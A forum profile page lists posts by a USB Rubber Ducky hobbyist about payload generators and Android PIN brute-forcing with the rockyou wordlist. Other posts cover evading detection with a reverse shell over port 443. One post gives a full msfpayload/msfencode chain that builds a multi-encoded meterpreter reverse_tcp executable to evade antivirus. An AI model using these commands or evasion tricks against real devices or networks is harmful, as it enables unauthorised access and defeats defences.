Jump to content

CaptainHooligan

Active Members
  • Content Count

    12
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by CaptainHooligan

  1. Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity. #!/bin/bash # # Payload-Generator version 1.0 # This tool is licensed under the GPLv3. Currently maintained by # James Luther (CaptainHooligan) # # This tool is used to generate payloads for the USB Rubber Ducky # # ===============================================================
  2. Good call! As always the more research you do on a target the better prepared you can be.
  3. Great share! Just as mentioned above, some AV solutions include a Host Based Security System (HBSS) which can whitelist hardware as well as software. In an environment that uses all Dell keyboards or just specific ones that do not use generic drivers this attack would be defeated.
  4. That was pretty much the point I was trying to make, there is always a way to get around what security implementations you run into. The duck does appear as a HID which means what user limits we run into are what we have to deal with. If the security implementation has application white listing the download will not matter as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators. Either way, know the environment and plan accordingly as there is always a way when thinking outside the box.
  5. It doesn't really matter what the limitations are set to users. There will always be some way to bypass security in one way or another. For example: robust firewall solution combined with application white listing, limited permissions and USB mass storage disabled means you aren't going to be able to download a file nor will you be able to bring one in.
  6. This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc. Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here: https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing
  7. Any easy thought is can these PC's access the internet behind the routers and firewall? If so just run a secure reverse shell over 443. Some IDS will look at the tcp stream and see the amount of traffic as anomalous but most will see encrypted traffic and ignore it.
  8. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen. #!/bin/bash clear echo -e "====================================================
  9. Check out dSploit. It is an open source project similar to this.
  10. I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe [/CODE] That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to g
  11. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. ** Edit ** Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen. #!/bin/bash clear echo -e "=====================================
×
×
  • Create New...